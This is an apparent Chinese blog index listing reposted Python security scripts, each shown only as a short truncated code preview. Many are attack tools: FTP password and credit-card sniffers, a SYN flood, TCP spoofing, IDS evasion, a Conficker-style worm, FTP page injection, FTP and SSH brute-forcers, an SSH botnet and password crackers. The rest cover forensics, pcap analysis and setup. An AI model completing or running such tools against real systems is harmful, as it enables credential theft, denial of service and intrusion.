- 博客(44)
- 收藏
- 关注
转载 Scapy嗅探FTP用户密码
#!/usr/bin/python#coding=utf-8import optparsefrom scapy.all import *def ftpSniff(pkt): dest = pkt.getlayer(IP).dst raw = pkt.sprintf('%Raw.load%') user = re.findall('(?i)USER (.*)', r
2018-01-23 23:46:11 1547
转载 Scapy嗅探TCP数据包
#!/usr/bin/python#coding=utf-8import reimport optparsefrom scapy.all import *def findCreditCard(pkt): raw = pkt.sprintf('%Raw.load%') # American Express信用卡由34或37开头的15位数字组成 americaRE = re.find
2018-01-23 18:06:35 2510
原创 取证应用程序
Pfish.py# -*- coding:UTF-8 -*-## p-fish : Python File System Hash Program# Author: C. Hosmer# July 2013# Version 1.0#import logging #Python Standard Library Loggerimport time
2018-01-21 17:36:12 544
转载 使用Scapy愚弄入侵检测系统
#!/usr/bin/python#coding=utf-8import optparsefrom scapy.all import *from random import randint# 触发DDoS警报def ddosTest(src, dst, iface, count): pkt = IP(src=src, dst=dst) / ICMP(type=8, id=67
2018-01-18 15:20:03 637
转载 伪造TCP连接
#!/usr/bin/python#coding=utf-8import optparsefrom scapy.all import *def synFlood(src, tgt): # TCP源端口不断自增一,而目标端口513不变 for sport in range(1024, 65535): IPlayer = IP(src=src, dst=tgt
2018-01-18 10:11:36 2361
转载 计算TCP序列号
#!/usr/bin/python#coding=utf-8from scapy.all import *def calTSN(tgt): seqNum = 0 preNum = 0 diffSeq = 0 # 重复4次操作 for x in range(1,5): # 若不是第一次发送SYN包,则设置前一个序列号值为上一次SYN/A
2018-01-18 09:27:09 1099
转载 使用Scapy制造SYN洪泛攻击
#!/usr/bin/python#coding=utf-8from scapy.all import *import optparsedef synFlood(src, tgt): # TCP源端口不断自增一,而目标端口513不变 for sport in range(1024, 65535): IPlayer = IP(src=src, dst=tgt
2018-01-17 16:49:41 1606
转载 用Scapy找出fast-flux流量
#!/usr/bin/python#coding=utf-8from scapy.all import *dnsRecords = {}'''解析pcap文件中所有含DNSRR的数据包,提取分别含有查询的域名和对应的IP的rrname和rdata变量,然后建立一个索引字典并对字典中未出现的IP添加到数组中。'''def handlePkt(pkt): # 判断是否含有DNS
2018-01-17 15:45:05 507
原创 用Scapy解析TTL字段的值
#!/usr/bin/python#coding=utf-8from scapy.all import *import timeimport optparse# 为避免IPy库中的IP类与Scapy库中的IP类冲突,重命名为IPTEST类from IPy import IP as IPTESTttlValues = {}THRESH = 5# 检查数据包的IP层,提取出源IP
2018-01-17 11:14:29 1653 1
转载 Mac平台安装scapy
注:python2.7.10一、首先scapy依赖了以下几个库:1.PyX : 2.pcapy3.gnuplot-py4.dnet其中gnuplot-py 以及pyx一定要使用官方网站上面的指定版本。使用备份库github: https://github.com/todototry/scapyInstallD
2018-01-17 08:55:12 2321 1
转载 分析LOIC流,判断DDoS攻击源
#!/usr/bin/python#coding=utf-8import dpktimport socketimport optparse# 默认设置检测不正常数据包的数量的阈值为1000THRESH = 1000def findDownload(pcap): for (ts, buf) in pcap: try: eth = dp
2018-01-16 11:51:47 2275
转载 解析TCP数据包,针对符合端口条件的数据关键字过滤
#!/usr/bin/python#coding=utf-8import dpktimport socketdef findHivemind(pcap): for (ts, buf) in pcap: try: eth = dpkt.ethernet.Ethernet(buf) ip = eth.data
2018-01-16 10:39:27 586
转载 解析HTTP协议,GET方法中寻找关键字。
#!/usr/bin/python#coding=utf-8import dpktimport socketdef findDownload(pcap): for (ts, buf) in pcap: try: eth = dpkt.ethernet.Ethernet(buf) ip = eth.data
2018-01-16 10:37:47 938
转载 使用Python画谷歌地图
#!/usr/bin/python#coding=utf-8import dpktimport socketimport pygeoipimport optparsegi = pygeoip.GeoIP('GeoLiteCity.dat')# 通过IP地址的经纬度构建kml结构def retKML(ip): rec = gi.record_by_name(ip)
2018-01-15 19:00:16 4581 1
转载 IP地址对应的物理位置简单地解析出城市
#!/usr/bin/python# -*- coding: utf-8 -*import dpktimport socketimport pygeoipimport optparsegi = pygeoip.GeoIP('GeoLiteCity.dat')# 查询数据库相关的城市信息并输出def printRecord(tgt): rec = gi.record_by
2018-01-15 17:04:12 3158
转载 使用Dpkt解析包
#!/usr/bin/python#coding=utf-8import dpktimport socketimport optparsedef printPcap(pcap): # 遍历[timestamp, packet]记录的数组 for (ts, buf) in pcap: try: # 获取以太网部分数据
2018-01-15 15:10:48 5313
转载 使用PyGeoIP关联IP地址和物理地址
#!/usr/bin/python# -*- coding: utf-8 -*-import pygeoipimport optparsegi = pygeoip.GeoIP('GeoLiteCity.dat')# 查询数据库相关的城市信息并输出def printRecord(tgt): global gi rec = gi.record_by_name(tgt
2018-01-15 11:44:15 1342
转载 用Python解析火狐浏览器的SQLite3数据库
#!/usr/bin/python#coding = utf-8import reimport optparseimport osimport sqlite3def printDownloads(downloadDB): conn = sqlite3.connect(downloadDB) c = conn.cursor() c.execute('SELECT
2018-01-14 17:47:11 791
转载 操作DB数据库
#!/usr/bin/python#coding=utf-8import sqlite3import optparseimport os# 连接main.db数据库,申请游标,执行SQL语句并返回结果def printProfile(skypeDB): conn = sqlite3.connect(skypeDB) #定义一个游标,游标对象可以执行下列操作 '
2018-01-14 11:36:16 341
转载 查看图像文件的元数据
#!/usr/bin/python#coding=utf-8import optparsefrom PIL import Imagefrom PIL.ExifTags import TAGSimport urllib2from bs4 import BeautifulSoup as BSfrom os.path import basenamefrom urlpars
2018-01-14 11:34:14 4767
转载 构建自己的Conficker
#!/usr/bin/python#coding=utf-8import nmapimport osimport optparseimport sysdef findTgts(subNet): nmScan = nmap.PortScanner() #subNet 目标IP nmScan.scan(subNet,'445')
2018-01-11 12:24:29 184
转载 整合攻击代码
#!/usr/bin/python#coding=utf-8import ftplibimport optparseimport time#实现攻击def attack(username, password, tgtHost, redirect): ftp = ftplib.FTP(tgtHost) ftp.login(username, password) defPages
2018-01-09 15:16:06 2768 1
转载 在网页中加入恶意注入代码
#!/usr/bin/python#coding=utf-8import ftplibdef injectPage(ftp,page,redirect): f = open(page + '.tmp','w') ''' #ftplib.FTP.retrlines(command[, callback]) #使用文本传输模式返回在服务器上执行命令的结果。 #command是指定
2018-01-09 10:04:54 2854
转载 在FTP服务器上搜索指定文件
#!/usr/bin/python#coding=utf-8import ftplib'''函数检查每个文件返回默认WEB 页面文件名并将任何发现的默认 WEB 页面文件名添加到名为 retList 的列 表中。完成迭代这些文件之后,函数将返回这个列表。'''def returnDefault(ftp): try: #nlst()方法获取目录下的文件 dirList=f
2018-01-08 17:40:34 4022
转载 使用Ftplib暴力破解FTP用户口令
#!/usr/bin/python#coding=utf-8import ftplibdef bruteLogin(hostname, passwdFile): pF=open(passwdFile,'r') for line in pF.readlines(): username=line.split(':')[0] password=line.split(':')[1].s
2018-01-08 10:17:11 1541
转载 用Python构建匿名FTP扫描器
#!/usr/bin/python#coding=utf-8#Python中默认安装的ftplib模块定义了FTP类,其中函数有限,可用来实现简单的ftp客户端,用于上传或下载文件import ftplibdef anonLogin(hostname): try: #设置变量 ftp = ftplib.FTP(hostname)
2018-01-07 16:49:26 601
转载 kali linux 开机无法进入图形化界面 解决办法 亲测
今天开机居然不是以往的图形化界面可能 是丢失 或者别的什么愿意吧 输入startx 没有反应 然后Google下 可能是图形化界面程序出错了 大概是这个原因 重新安装 图形化界面 成功进入 代码如下1.$ apt-get update2.$ apt-get install x-window-system-core3.$ apt-get instal
2018-01-07 16:17:55 46323 8
转载 用vsftpd建立匿名ftp服务器
实现ftp匿名登录,上传,下载,重命名文件。首先安装vsftpd:sudo apt-get install vsftpd装好之后,默认的ftp根目录是在 /srv/ftp为该目录设置分组及权限: sudo chown root:ftp /srv/ftp sudo chmod 755 /srv/ftp (注意:vs
2018-01-07 15:17:36 1802
转载 OSX 10.13 以后实现终端FTP命令
10.13 以后就没了........这样操作亲测可以恢复 1,brew install telnet 2,brew install inetutils 3,brew link --overwrite inetutils
2018-01-07 14:33:54 10065
转载 构建SSH僵尸网络
#!/usr/bin/python #coding=utf-8 import optparse from pexpect import pxssh import optparse #建立一个名为botnet 的全局数组,其中记录了单个client 对象 botNet=[] #定义一个用于存放host的列表以便判断当前host之前是否已经添加进botNet中了 h
2018-01-07 12:52:18 1082 1
转载 用kali生成密钥
1.首先要确保SSH服务已经启动root@kali:~# vi /etc/ssh/sshd_config root@kali:/#/etc/init.d/ssh start验证SSH服务状态root@kali:/#/etc/init.d/sshstatus2.生成密钥KEYroot@kali:~#ssh-keygen -t
2018-01-06 14:19:47 2748
转载 通过 Pxssh 暴力破解 SSH 密码
#!/usr/bin/python #coding=utf-8 from pexpect import pxssh import optparse import time from threading import * #最大连接数被设置为5,在每个thread启动时注册一个信号量,在connect函数结束时注销这个信号量,这样同时存在的线程数量就被控制为5个。maxC
2018-01-05 18:50:53 646
转载 用Pxssh实现与SSH的简单交互
#!/usr/bin/python #coding=utf-8from optparse import OptionParser from pexpect import pxssh def send_command(child,cmd): child.sendline(cmd) #匹配prompt(提示符) child.prompt(
2018-01-05 11:09:46 2139
转载 用Pexpect与SSH交互(实现了参数化输入以及命令行shell交互的形式)
#!/usr/bin/python #coding=utf-8 import pexpect from optparse import OptionParser #SSH连接成功时的命令行交互窗口中的提示符的集合 PROMPT = ['# ','>>> ','> ','\$ '] def send_command(child,cmd): #发送一条命
2018-01-05 10:01:06 1044
转载 Pexpect 模块使用说明
背景介绍Expect 程序主要用于人机对话的模拟,就是那种系统提问,人来回答 yes/no ,或者账号登录输入用户名和密码等等的情况。因为这种情况特别多而且繁琐,所以很多语言都有各种自己的实现。最初的第一个 Expect 是由 TCL 语言实现的,所以后来的 Expect 都大致参考了最初的用法和流程,整体来说大致的流程包括:运行程序程序要求人的判断和输入Expect 通过关键字匹配
2018-01-04 16:19:39 1630
转载 用Pexpect与SSH交互
#!/usr/bin/python#coding=utf-8import pexpect#SSH连接成功时的命令行交互窗口中前面的提示字符的集合PROMPT = ['# ','>>> ','> ','\$ ']def send_command(child,cmd): #发送一条命令 child.sendline(cmd) #期望有命令行提示字符出现 child.expect
2018-01-04 11:46:19 456
转载 Kali Linux SSH登录不成功解决方法
# vim /etc/ssh/sshd_config修改:#PasswordAuthentication yes为:PasswordAuthentication yes修改:PermitRootLogin prohibit-password
2018-01-04 10:12:21 4699 1
转载 Zip文件口令破解机
#!/usr/bin/python#coding=utf-8import zipfileimport optparsefrom threading import Threaddef extractFile(zFile,password): try: ''' extractall(self, path=None, members=None, pwd=None) 从存档中提取
2018-01-03 16:18:40 764
转载 Unix口令破解机
#!/usr/bin/python#coding=utf-8import cryptdef testPass(cryptPass): salt = cryptPass[0:2] dictFile = open('dictionary.txt','r') for word in dictFile.readlines(): word = word.strip('\n') cr
2018-01-03 15:39:27 457
转载 文件判断
#!/usr/bin/python#coding=utf-8import sysimport osif len(sys.argv) == 2: #sys.argv列表中含有所有的命令行参数,sys.argv[0]为Python脚本的名称,其余的都是命令行参数 filename = sys.argv[1] #OS模块 #os.path.isfile()检查该文件是否存在
2018-01-03 15:16:07 170
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人